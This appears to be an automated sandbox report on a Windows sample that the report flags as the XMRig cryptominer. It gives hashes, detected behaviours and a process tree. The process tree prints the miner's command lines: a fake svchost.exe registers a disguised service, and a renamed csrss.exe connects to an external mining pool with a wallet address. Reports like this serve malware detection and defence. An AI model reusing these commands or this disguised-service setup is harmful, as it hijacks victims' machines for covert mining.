Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23/12/2024, 15:20
Static task
static1
Behavioral task
behavioral1
Sample
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
Resource
win7-20240903-en
General
-
Target
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe
-
Size
910KB
-
MD5
ca0fb79fde083ec2ba5625c6d1c208d8
-
SHA1
eb215b41f55ac1588d09354f5b1d32d5de92f248
-
SHA256
ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229
-
SHA512
e990977492d710767a1847782399ca8078cd74303afabe0a68469d3006ccd6125442cc72e12860f5c04b7cc16fd8e3ddbd3ad6b906abcbb9970d0ca239aebfc7
-
SSDEEP
12288:SvfyIIIzAClE7uDOch+h2ul/mJot38gi5Y9ND3aHSkRcdT1/zdP1r:esSzlEqF+hVcOfi5YrDAWT9Bdr
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 1 IoCs
resource yara_rule behavioral1/files/0x0007000000014a05-30.dat xmrig -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts irsetup.exe File created C:\Windows\System32\drivers\etc\hosts irsetup.exe -
Executes dropped EXE 6 IoCs
pid Process 2424 irsetup.exe 2868 svchost.exe 2604 svchost.exe 476 Process not Found 2664 svchost.exe 2972 csrss.exe -
Loads dropped DLL 9 IoCs
pid Process 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 2424 irsetup.exe 2424 irsetup.exe 2424 irsetup.exe 2424 irsetup.exe 2424 irsetup.exe 2744 cmd.exe 2744 cmd.exe 2664 svchost.exe -
resource yara_rule behavioral1/files/0x000800000001471c-1.dat upx behavioral1/memory/1852-4-0x0000000002730000-0x0000000002857000-memory.dmp upx behavioral1/memory/2424-10-0x0000000000530000-0x0000000000657000-memory.dmp upx behavioral1/memory/2424-50-0x0000000000400000-0x0000000000527000-memory.dmp upx -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2516 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language irsetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2384 PING.EXE 1028 PING.EXE 692 PING.EXE -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 2384 PING.EXE 1028 PING.EXE 692 PING.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeLockMemoryPrivilege 2972 csrss.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2424 irsetup.exe 2424 irsetup.exe -
Suspicious use of WriteProcessMemory 53 IoCs
description pid Process procid_target PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 1852 wrote to memory of 2424 1852 ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe 28 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2424 wrote to memory of 2744 2424 irsetup.exe 29 PID 2744 wrote to memory of 2868 2744 cmd.exe 31 PID 2744 wrote to memory of 2868 2744 cmd.exe 31 PID 2744 wrote to memory of 2868 2744 cmd.exe 31 PID 2744 wrote to memory of 2868 2744 cmd.exe 31 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2384 2744 cmd.exe 32 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 2516 2744 cmd.exe 33 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 1028 2744 cmd.exe 34 PID 2744 wrote to memory of 2604 2744 cmd.exe 35 PID 2744 wrote to memory of 2604 2744 cmd.exe 35 PID 2744 wrote to memory of 2604 2744 cmd.exe 35 PID 2744 wrote to memory of 2604 2744 cmd.exe 35 PID 2664 wrote to memory of 2972 2664 svchost.exe 38 PID 2664 wrote to memory of 2972 2664 svchost.exe 38 PID 2664 wrote to memory of 2972 2664 svchost.exe 38 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39 PID 2744 wrote to memory of 692 2744 cmd.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\_ir_sf7_temp_0\irsetup.exe__IRAOFF:520716 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\ede0ecc1882d945e7d78c3d722bb1b06dec2bcdc2a97285b14106e4c99497229.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\SysWOW64\cmd.execmd /c C:\ProgramData\Temp\run64.bat3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe install "Disk Defragmenter Reports" C:\ProgramData\Temp\csrss.exe -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=504⤵
- Executes dropped EXE
PID:2868
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2384
-
-
C:\Windows\SysWOW64\sc.exesc description "Disk Defragmenter Reports" "┤┼┼╠╦Θ╞¼╒√└φ▒¿╕µ╠ß╣⌐╓º│╓íú"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2516
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1028
-
-
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe start "Disk Defragmenter Reports"4⤵
- Executes dropped EXE
PID:2604
-
-
C:\Windows\SysWOW64\PING.EXEping -n 3 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:692
-
-
-
-
C:\ProgramData\Temp\svchost.exeC:\ProgramData\Temp\svchost.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\ProgramData\Temp\csrss.exe"C:\ProgramData\Temp\csrss.exe" -o pool.ppxxmr.com:443 -u 46U8UUW1ekBc8qEu2hVqgsJfkZq9QGVah2wrc1nx51ER2sXdsPQtimD3Gyg2yzcDY5WzuKT56dwtSaNnKtMGFuBZ4egVagc -p x -k --max-cpu-usage=502⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
413KB
MD59fb6eb5b8e72e6671765a91f12f273fb
SHA1e476d2caaaf8506d8798cca874ab70f31a23a44f
SHA2569a0db3da87598e4e38a40d8a49bf71e5f708fb3de3b044db0c17ab369041c1b4
SHA5123e2188c99e6cc6dc9062896d628b5df834c629a7000040b46d640f495c93af27b3cf32ac6af8ea88a57e343d0dbb815658cfa6df6c62be8dee208373c9ef2fed
-
Filesize
484B
MD539a4b61f3776e96201ff30b4f4a28afd
SHA1f293bfe02dd2b058330dce8a3ddab23ac5ea708d
SHA25627ed8d3eab67d1ce02e40542e18d8444f4a9e7989a02cb7f41baf88f9d544d02
SHA512b0cb6592dd5dcac3b31ee6979d04eb564523da1903fe9b0bb47fc331c1af2557aafff9237ad9b9cd849fecbcde13fa482517048a96becaaa8ca58f7216b288c8
-
Filesize
345KB
MD51e706b1e8d3bd3764e3ee4bf5fe509d8
SHA1ba457bfcdc1b66609f142c3578be647c51d1356d
SHA25629f0dbf2d07c4b68c3c9ee0d139d80bad3e9058fbf9dbd574cb5b047cf742e74
SHA512f1b6eb345e3114e68a8b78cb711717b60b4604e6ff7578c2df3861187946b05b77259243e5b04c4b7e4a16dd6b1045a94f99cbeb46e5eac9e8c43c82d9e9d924
-
Filesize
440KB
MD575ca7ff96bf5a316c3af2de6a412bd54
SHA10a093950790ff0dddff6f5f29c6b02c10997e0c5
SHA256d95b5bf9ca97c1900de5357743282bab655d61d616606485088e1708559b7cf1
SHA512b8da86f2f1e908955254e5168d0447f479cec7815a8b081a7b38eb87187cb2eb992109c67e006361b96bc1529ee8abc9dc477d78e9ca565e43f5415b492771d4